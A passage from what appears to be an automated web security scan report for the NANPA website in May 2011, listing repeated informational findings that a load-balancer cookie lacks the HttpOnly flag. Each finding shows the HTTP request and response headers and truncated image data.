13.55. http://www.nationalnanpa.com/area_code_maps/usmaps/ky.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ky.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ky.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "28736-200b-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 8203
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.56. http://www.nationalnanpa.com/area_code_maps/usmaps/la.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/la.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/la.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "a81f3-2aa4-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 10916
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.57. http://www.nationalnanpa.com/area_code_maps/usmaps/ma.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/ma.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ma.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:08:00 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "a81e7-35a1-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 13729
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.58. http://www.nationalnanpa.com/area_code_maps/usmaps/us.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/area_code_maps/usmaps/us.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/us.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:17 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:19 GMT
ETag: "a81ea-a407-471ab6c68dac0"
Accept-Ranges: bytes
Content-Length: 41991
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a0.t...............Ds.s................{xv................h......JPJ........s..................xxx662..................EE8..................qiT....

..shggVjV}ve.......~9c{d.....u......Tfn.._..?.
...[SNIP]...

13.59. http://www.nationalnanpa.com/contact_us/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/contact_us/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact_us/index.html HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:17 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 410
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

13.60. http://www.nationalnanpa.com/content/img/cm_areaMap.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/cm_areaMap.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/cm_areaMap.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:52 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 19:45:58 GMT
ETag: "a004b-64ed-486e397200980"
Accept-Ranges: bytes
Content-Length: 25837
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:18 15:40:35.........
...[SNIP]...

13.61. http://www.nationalnanpa.com/content/img/codeMap_bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/codeMap_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/codeMap_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:53 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:25 GMT
ETag: "a002a-6fa-471ab6cc46840"
Accept-Ranges: bytes
Content-Length: 1786
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''. ..
. ...................................!! !!''''''''''...........
...[SNIP]...

13.62. http://www.nationalnanpa.com/content/img/fastTrack_bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/fastTrack_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/fastTrack_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:52 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 19:45:59 GMT
ETag: "a0033-3eef-486e3972f4bc0"
Accept-Ranges: bytes
Content-Length: 16111
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

......JFIF.....H.H.....|Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:18 15:30:22.........
...[SNIP]...

13.63. http://www.nationalnanpa.com/content/img/feedBack_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/feedBack_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/feedBack_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 16:02:34 GMT
ETag: "28773-5d-4871cd1b55a80"
Accept-Ranges: bytes
Content-Length: 93
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.......SSS666PPP===JJJ:::TTTQQQ444NNNHHHEEEBBBLLL......!.......,..........
..2.R.%q...;

13.64. http://www.nationalnanpa.com/content/img/hp_img_a.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/hp_img_a.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/hp_img_a.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:49 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:29:41 GMT
ETag: "28789-55b7-4871edfd6af40"
Accept-Ranges: bytes
Content-Length: 21943
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:21 14:29:25.........
...[SNIP]...

13.65. http://www.nationalnanpa.com/content/img/hp_img_b.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/hp_img_b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/hp_img_b.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:53 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:29:41 GMT
ETag: "2877d-56fa-4871edfd6af40"
Accept-Ranges: bytes
Content-Length: 22266
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:21 14:28:37.........
...[SNIP]...

13.66. http://www.nationalnanpa.com/content/img/leftNav_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/leftNav_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/leftNav_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 18:39:01 GMT
ETag: "a004a-40-486e2a7b17b40"
Accept-Ranges: bytes
Content-Length: 64
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a........g;.`7.M,.F(.V1.i<......!.......,...........8B.U .;

13.67. http://www.nationalnanpa.com/content/img/legal_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/legal_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/legal_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:34 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 17:58:29 GMT
ETag: "28785-5c-486e216bc1b40"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.......................................................!.......,.......... ..A.(...#.;

13.68. http://www.nationalnanpa.com/content/img/mainbg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/mainbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/mainbg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:15 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:25 GMT
ETag: "a003a-1ea-471ab6cc46840"
Accept-Ranges: bytes
Content-Length: 490
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a... ..............................................................................................................................................................................................
...[SNIP]...

13.69. http://www.nationalnanpa.com/content/img/nanpa_hp_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nanpa_hp_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nanpa_hp_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:21:00 GMT
ETag: "28770-1fa-486e0ba1b7300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89af.!.......V.u...x.........S?4lZ......g..Exh$_L.......G1,....f.!......I..8....`(.di.h..l..p,.tm.x..|n8@..P!....A......Q....."....,.....f..`.2p$....0.......f..._.
.. H...... Y..@t....mf....@y..[..
...[SNIP]...

13.70. http://www.nationalnanpa.com/content/img/nav_acMap_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_acMap_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_acMap_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2877e-5cc-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1484
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........X.{Q..W..U.~S.|R..T.S..V...E.}.....................E.~E.|t..E....^..a...t......._..^......t..%.f5.s%.l......T..T..5.v%.j......d....\E...5.r5.qT..T..%.ht.....t..T....`d..5.t.....gE.|.
...[SNIP]...

13.71. http://www.nationalnanpa.com/content/img/nav_acMap_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_acMap_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_acMap_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0031-5ce-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1486
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..F..D..C..E..D..G............A.r.........q..@.qA.sA.u.....P...........S..Q..P......... .Y...q..!._1.gA.r!.]q.......Na..A.t...Q.~1.j...1.fQ..q.....0.e..Ra..Q.~q..1.h...Q.Q.}...!
...[SNIP]...

13.72. http://www.nationalnanpa.com/content/img/nav_act_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_act_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_act_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a002e-501-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1281
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........X.{Q..W.~S.|R..U.S..V..TE.}..................E.|....._..^E.~...E.....5.r.....^5.s5.t....\t....a...d..5.v...d.....E.|t..E....d....t..%.l%.jE.......T.............g...E.......bE....5
...[SNIP]...

13.73. http://www.nationalnanpa.com/content/img/nav_act_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_act_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_act_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a004d-502-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..D..C..F..G..D..E...A.r............@.q.....P..QA.s...........PA.u1.f...1.g..N..Sq..1.hq.....a.....a..1.jA.q............l.....l....Vq..A.vA.tA.wl..l..A.r!.]...Q..........S.......
...[SNIP]...

13.74. http://www.nationalnanpa.com/content/img/nav_login_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_login_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_login_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2876a-530-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1328
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a........{Q..X..W.S.~S.|R..V..U..T...............E.}......E.~...t..E.t..E.....t..5.sE...^E..t....5.tE.|...t.....5.v.....aE.|...T..T.....%.j.._.....%.l...d.....t..%.f..E.{E....dd.......g5.r.
...[SNIP]...

13.75. http://www.nationalnanpa.com/content/img/nav_login_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_login_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_login_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:35 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "28784-530-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1328
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........B..I..H..D..D..C..G..F..E...............A.sq.....A.r............A.uA.tq.....A.rA.q..Pq..A.v...1.h1.gA.tq........@.q1.j.....S.........Q.}@.o...l.. .YA.wQ.~l..a..l..a..!.]...!._...q..l..q
...[SNIP]...

13.76. http://www.nationalnanpa.com/content/img/nav_numRes_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_numRes_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_numRes_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
